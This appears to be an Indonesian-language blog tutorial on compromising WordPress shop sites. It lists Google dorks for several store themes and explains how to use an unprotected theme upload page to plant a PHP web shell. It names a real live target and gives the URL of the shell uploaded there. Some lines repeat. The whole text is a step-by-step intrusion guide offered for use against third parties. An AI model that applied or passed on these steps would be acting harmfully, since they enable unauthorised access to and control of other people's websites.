Dork :
inurl:/wp-content/themes/WPStore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
Oke kita mulai masukan salah satu dork diatas kedalam mesin pencaharian google. oke lihat gambar dibawah.
saya ambil dork yang inurl:/wp-content/themes/framework
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework
Oke kita mulai masukan salah satu dork diatas kedalam mesin pencaharian google. oke lihat gambar dibawah.
saya ambil dork yang inurl:/wp-content/themes/framework
pilih salah satu website yang ada disitu. saya ambil live target http://www.compareukprice.com/wp-content/themes/framework/upload/
Exploit : www.site.com/wp-content/themes/TYPESTORE/upload
Exploit : www.site.com/wp-content/themes/TYPESTORE/upload
upload file Pilih Berkas , upload shell ya jangan upload photo
pilih salah satu shell kamu seperti gambar diatas
tunggu sampai proses loading selesai , kalau loading tidak selesai-selesai tinggalkan saja web itu
jika sudah , proses loadingnya akan hilang , seperti gambar diatas
jika semua proses diatas sudah selesai kamu bisa langsung akses shell kamu.
jika semua proses diatas sudah selesai kamu bisa langsung akses shell kamu.
di
www.site.com/wp-content/uploads/products_img/NAMASHELLKAMU.typefile
atau
www.site.com/wp-content/uploads/TAHUNUPLOADKAMU/BULANUPLOADKAMU/NAMASHELLKAMU.typefile
contoh :
www.site.com/wp-content/uploads/products_img/NAMASHELLKAMU.typefile
atau
www.site.com/wp-content/uploads/TAHUNUPLOADKAMU/BULANUPLOADKAMU/NAMASHELLKAMU.typefile
contoh :
http://www.compareukprice.com/wp-content/uploads/products_img/shell7.php Hasil dari live target
Posting Komentar